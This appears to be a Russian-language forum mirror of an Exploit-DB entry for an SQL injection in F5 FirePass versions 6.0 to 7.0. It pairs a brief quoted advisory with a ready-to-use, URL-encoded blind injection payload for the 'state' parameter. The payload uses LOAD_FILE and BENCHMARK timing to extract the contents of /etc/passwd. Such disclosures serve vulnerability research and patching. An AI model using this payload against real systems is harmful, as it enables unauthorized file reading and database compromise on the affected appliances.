- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 36995
- Проверка EDB
-
- Пройдено
- Автор
- ANONYMOUS
- Тип уязвимости
- REMOTE
- Платформа
- HARDWARE
- CVE
- N/A
- Дата публикации
- 2012-03-14
F5 FirePass 7.0 - SQL Injection
Код:
source: https://www.securityfocus.com/bid/52653/info
FirePass is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following versions of FirePass are affected:
6.0
6.0.1
6.0.2
6.0.2.3
6.0.3
6.1
7.0
state=%2527+and+
(case+when+SUBSTRING(LOAD_FILE(%2527/etc/passwd%2527),1,1)=char(114)+then+
BENCHMARK(40000000,ENCODE(%2527hello%2527,%2527batman%2527))+else+0+end)=0+--+- Источник
- www.exploit-db.com
